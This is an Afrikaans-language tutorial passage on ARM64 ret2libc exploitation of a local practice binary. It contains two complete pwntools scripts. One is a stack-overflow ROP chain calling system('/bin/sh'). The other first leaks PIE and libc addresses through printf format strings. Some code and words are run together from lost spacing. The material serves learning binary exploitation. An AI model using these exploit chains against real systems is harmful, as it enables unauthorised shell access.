Deur 'n patroon te skep met pattern create 200, dit te gebruik, en die offset te kontroleer met pattern search $x30 kan ons sien dat die offset 108 (0x6c) is.
As ons na die gedissemboleerde hooffunksie kyk, kan ons sien dat ons graag wil spring na die instruksie om direk na printf te spring, waarvan die offset vanaf waar die binêre gelaai word 0x860 is:
Vind system en /bin/sh string
Aangesien die ASLR gedeaktiveer is, gaan die adresse altyd dieselfde wees:
Vind Gadgets
Ons moet in x0 die adres na die string /bin/sh hê en system aanroep.
Hierdie gadget sal x0 laai vanaf $sp + 0x18 en dan die adresse x29 en x30 van sp laai en na x30 spring. So met hierdie gadget kan ons die eerste argument beheer en dan na system spring.
Exploit
from pwn import*from time import sleepp =process('./rop')# For local binarylibc =ELF("/usr/lib/aarch64-linux-gnu/libc.so.6")libc.address =0x0000fffff7df0000binsh =next(libc.search(b"/bin/sh"))#Verify with find /bin/shsystem = libc.sym["system"]defexpl_bof(payload):p.recv()p.sendline(payload)# Ret2mainstack_offset =108ldr_x0_ret =p64(libc.address +0x6bdf0)# ldr x0, [sp, #0x18]; ldp x29, x30, [sp], #0x20; ret;x29 =b"AAAAAAAA"x30 =p64(system)fill =b"A"* (0x18-0x10)x0 =p64(binsh)payload =b"A"*stack_offset + ldr_x0_ret + x29 + x30 + fill + x0p.sendline(payload)p.interactive()p.close()
Ret2lib - NX, ASL & PIE omseiling met printf leaks vanaf die stapel
Deur 'n breekpunt in te stel voordat printf aangeroep word, is dit moontlik om te sien dat daar adresse is om na die binêre terug te keer in die stapel en ook libc adresse:
Deur verskillende offsets te probeer, kan die %21$p 'n binêre adres lek (PIE omseiling) en %25$p kan 'n libc adres lek:
Deur die gelekte libc adres met die basisadres van libc af te trek, is dit moontlik om te sien dat die offset van die gelekte adres vanaf die basis 0x49c40 is.
x30 offset
Sien die vorige voorbeeld aangesien die bof dieselfde is.
Vind Gadgets
Soos in die vorige voorbeeld, moet ons in x0 die adres na die string /bin/sh hê en system aanroep.
Deur rooper is 'n ander interessante gadget gevind:
Hierdie gadget sal x0 laai vanaf $sp + 0x78 en dan die adresse x29 en x30 vanaf sp laai en na x30 spring. So met hierdie gadget kan ons die eerste argument beheer en dan na system spring.
Exploit
from pwn import*from time import sleepp =process('./rop')# For local binarylibc =ELF("/usr/lib/aarch64-linux-gnu/libc.so.6")defleak_printf(payload,is_main_addr=False):p.sendlineafter(b">\n" ,payload)response = p.recvline().strip()[2:] #Remove new line and "0x" prefixif is_main_addr:response = response[:-4]+b"0000"returnint(response, 16)defexpl_bof(payload):p.recv()p.sendline(payload)# Get main addressmain_address =leak_printf(b"%21$p", True)print(f"Bin address: {hex(main_address)}")# Ret2mainstack_offset =108main_call_printf_offset =0x860#Offset inside main to call printfleakprint("Going back to "+str(hex(main_address + main_call_printf_offset)))ret2main =b"A"*stack_offset +p64(main_address + main_call_printf_offset)expl_bof(ret2main)# libclibc_base_address =leak_printf(b"%25$p")-0x26dc4libc.address = libc_base_addressprint(f"Libc address: {hex(libc_base_address)}")binsh =next(libc.search(b"/bin/sh"))system = libc.sym["system"]# ret2systemldr_x0_ret =p64(libc.address +0x49c40)# ldr x0, [sp, #0x78]; ldp x29, x30, [sp], #0xc0; ret;x29 =b"AAAAAAAA"x30 =p64(system)fill =b"A"* (0x78-0x10)x0 =p64(binsh)payload =b"A"*stack_offset + ldr_x0_ret + x29 + x30 + fill + x0p.sendline(payload)p.interactive()